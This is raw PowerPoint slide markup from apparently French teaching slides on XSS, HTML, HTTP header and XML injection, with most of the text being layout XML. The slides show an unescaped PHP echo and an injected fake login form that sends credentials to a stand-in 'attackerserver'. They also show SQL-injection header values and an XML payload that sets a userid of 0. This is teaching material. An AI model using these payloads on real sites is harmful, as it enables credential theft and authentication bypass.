              <a:t>Injection javascript : Deux catégories d'attaque peuvent être utilisées, l'attaque de Cross-site scripting (XSS) et celle du heap-spraying.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection HTML différent d’une injection XSS : La différence se trouve pas dans la vulnérabilité , mais dans le type d'attaque qui tire parti de la vulnérabilité . Alors que XSS utilise des balises de script à exécuter JavaScript , injection HTML utilise simplement HTML pour modifier la page pour des raisons malveillantes .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Ex : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    $name = $_REQUEST ['name'];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;h1&gt;Welcome to the Internet!&lt;/h1&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;br&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            Hello, &lt;?php echo $name; ?&gt;!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	    &lt;p&gt;We are so glad you are here!&lt;/p&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;/body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1/vulnerable.php?name=&lt;h3&gt;Please Enter Your Username and Password to Proceed:&lt;/h3&gt;&lt;form method="POST" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>action="http://attackerserver/login.php"&gt;Username: &lt;input type="text" name="username" /&gt;&lt;br /&gt;Password: &lt;input type="password" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name="password" /&gt;&lt;br /&gt;&lt;input type="submit" value="Login" /&gt;&lt;/form&gt;&lt;!--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection HTTP :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET / HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connection: Keep-Alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keep-Alive: 300</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accept:*/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accept-Language: en-us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accept-Encoding: gzip, deflate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 ( .NET CLR 3.5.30729; .NET4.0E)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie: guest_id=v1%3A1328019064; pid=v1%3A1328839311134</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET /index.php HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: [host]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X_FORWARDED_FOR :127.0.0.1' or 1=1#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-Agent: aaa' or 1/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie Manager+ (on s’en servira plus tard)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;user&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      &lt;username&gt;tony&lt;/username&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      &lt;password&gt;Un6R34kb!e&lt;/password&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      &lt;userid&gt;500&lt;/userid&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      &lt;mail&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>s4tan@hell.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/mail&gt;&lt;userid&gt;0&lt;/userid&gt;&lt;mail&gt;s4tan@hell.com&lt;/mail&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;/user&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>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u="sn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2733675"/>
            <a:ext cx="7772400" cy="1470000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 14"/>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re et texte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algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Verdan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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2381249" y="-963082"/>
            <a:ext cx="4381500" cy="91440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3" name="Shape 53"/>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itre vertical et texte">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 54"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5245049" y="2569683"/>
            <a:ext cx="4826100" cy="205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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1054050" y="588483"/>
            <a:ext cx="4826100"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57" name="Shape 57"/>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2111123"/>
            <a:ext cx="7772400" cy="1546500"/>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60" name="Shape 6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61" name="Shape 61"/>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fr">
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr">
              <a:latin typeface="Dosis"/>
              <a:ea typeface="Dosis"/>
              <a:cs typeface="Dosis"/>
              <a:sym typeface="Dosi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algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr sz="300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0" y="1418167"/>
            <a:ext cx="9144000" cy="43815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a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-107950" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-76200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
